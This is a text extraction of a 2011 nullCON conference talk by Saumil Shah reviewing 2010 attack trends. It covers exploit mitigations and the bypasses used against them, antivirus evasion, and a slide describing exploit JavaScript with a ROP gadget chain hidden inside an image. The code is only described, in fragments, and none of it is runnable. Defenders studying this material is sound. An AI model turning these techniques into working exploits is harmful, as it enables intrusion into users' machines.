2010: A Net Odyssey
Saumil Shah
nullCON Goa, 26.02.2011
net-square | n|u dwitiya

Welcome to NullCON!
nullcon.net | null.co.in

# who am i
Saumil Shah - CEO Net-Square
saumilshah
Hacker

What did we learn from [image]?

Attack Surface

ATTACK SURFACE 2010-2011

Wider Attack Surface

Ease of Exploitation

Mass Manufacturing
World wide coverage,
Hides your tracks.

Complexity...
...as never seen before!

A New Dimension!
GUARANTEED!!
Fresh new bugs,
Present on most computers

"The amount of intelligence in the world is constant. And the population is increasing."

Browser Wars
Death of Standards
HTTP +0.1
Reckless Plugins

Exploit Mitigation Techniques

/GS
SafeSEH
DEP
ASLR
Permanent DEP
ASLR and DEP

Mitigation        Bypass technique seen in the wild
/GS               SEH overwrites
SafeSEH           non-SEH DLLs
DEP               Return to LibC
ASLR              Heap Sprays
Permanent DEP     ROP
ASLR and DEP      JIT Sprays

It's SPLOIT TIME!

Jedi A/V Tricks
These are not the sploitz you're looking for.

See no eval!
Obfuscated Javascript decoded without using eval, document.write, etc.
Acrobat CoolType exploit
IE+JNLP exploit

High Tech vs. Low Tech
Acrobat CoolType exploit: Return Oriented Programming code
Escape-From-PDF: No fancy tricks

This iz what?

I'm an evil Javascript
I'm an innocent image

[Slide 23: image of the exploit's JavaScript rendered inside a <CANVAS> element. Visible in the picture are a packv(n) helper that formats a 32-bit value as a "%u"-escaped string, an addressof table mapping ROP gadget names (ropnop, xchg_eax_esp_ret, pop_eax_ret, pop_ecx_ret, mov/inc/add/call/popad gadgets) to addresses, and the start of a call_ntallocatevirtualmemory(baseptr, size, callnum) function that packs those gadgets into a chain; the text is cut off at retval="".]

Server Side Vulnerabilities

SQL injection
XSS
CSRF
RFI/LFI
Input tampering

Who broke the Web?
HTML: Standards... What Standards? Object access, JS too powerful, SRC=
HTTP: Old and idiotic. Stateless, No Auth, Bursty

W3C
"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]

Application Delivery
Authentication
Statefulness
Data Typing
Non-mutable

The Web at present: HTTP, HTML; AJAX, Flash, Sandbox, HTML5, Anti-XSS, WAF, Silverlight, Web sockets
Application Delivery: Authentication, Statefulness, Data Typing, Non-mutable

The FUTURE is HERE!

No longer Science Fiction
DEP bypassing ROP code
Man in the Browser Malware
Political Cyber warfare

The Solution?

Keep on patching!

I can haz sandbox
I Also Can!

The Solution?
HTML 8.0
HTTP 2.0
Browser Security Model
Self Contained Apps

n|u dwitiya
kthxbai
saumil@net-square.com
slideshare.net/saumilshah
www.net-square.com


nullcon 2011 - Lessons learned from 2010
